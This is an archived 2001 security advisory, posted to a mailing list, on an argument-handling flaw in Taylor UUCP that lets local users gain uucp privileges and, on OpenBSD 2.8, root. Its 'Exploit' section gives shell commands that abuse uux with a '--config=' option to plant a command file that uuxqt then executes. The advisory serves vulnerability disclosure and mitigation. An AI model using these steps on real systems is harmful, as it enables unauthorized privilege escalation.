******************* Brief description *************
Due to incorrect argument handling in a component of the
Taylor UUCP package, it is possible for local users to
gain uid/gid uucp.
This may allow further elevation, depending on the system,
up to and including root access.
On OpenBSD 2.8 (and probably others) it allows root compromise.
By overwriting the uucp owned program /usr/bin/uustat, arbitrary
commands may be executed as part of the /etc/daily crontab script.
On Redhat 7.0 (and probably others) it allows creation of empty
files as root, and the ability to execute commands as if logged
in at the console (as checked via /lib/security/pam_console.so).
This may also allow further elevation of privileges, or denial of
service. (Tested against uucp-1.06.1-25)
Other systems running this package are also affected to
a greater or lesser degree.
*********************** Solution ******************
Patches should be available very soon, if not already, for most
affected systems.
If you do not require uucp functionality, you should remove the
uucp packages from your system.
********************** The Programs ***************
uux (1) - Remote command execution over UUCP
If you specify an alternative configuration, it will run as the user
that called it, and pass the same configuration to uuxqt.
uuxqt (1) - UUCP execution daemon
Defaults to allowing rmail and uucp to be run, and nothing else,
unless the configuration it is invoked with allows it to run other
commands.
uucp (1) - Unix to Unix copy
If you specify an alternate configuration, it will also run as the user
that called it.
uuxqt checks the arguments for the programs it is asked to execute
and gets rid of what it thinks are the potentially dangerous ones.
However, it does not remove long arguments.
******************** The Exploit ******************
uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
will execute uucp, but will not use the /tmp/vv.v configuration file.
However,
uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
will use the supplied configuration, without dropping privileges.
1) Make a configuration file that allows any command to be executed, and
allows files from anywhere to be copied to anywhere that is writable
by uid/gid uucp. ( /tmp/config.uucp )
2) Make a command file with the command you want to be executed.
( /tmp/commands.uucp )
3) Do something like the following:
$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}
The commands in /tmp/commands.uucp file will be executed by uuxqt, with
the uid/gid of uucp.
If you want to perform an exploit, and don't know what to put in the
files, you should read the documentation for uucp.
(Proof of concept root exploit for OpenBSD was performed on the wargame
running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )
-- zen-parse
===========================================================================
http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
= and %73%6f%75%6e%64%73%20%6f%6b
===========================================================================
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parseat_private to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
This archive was generated by hypermail 2b30 : Sat Sep 08 2001 - 12:23:57 PDT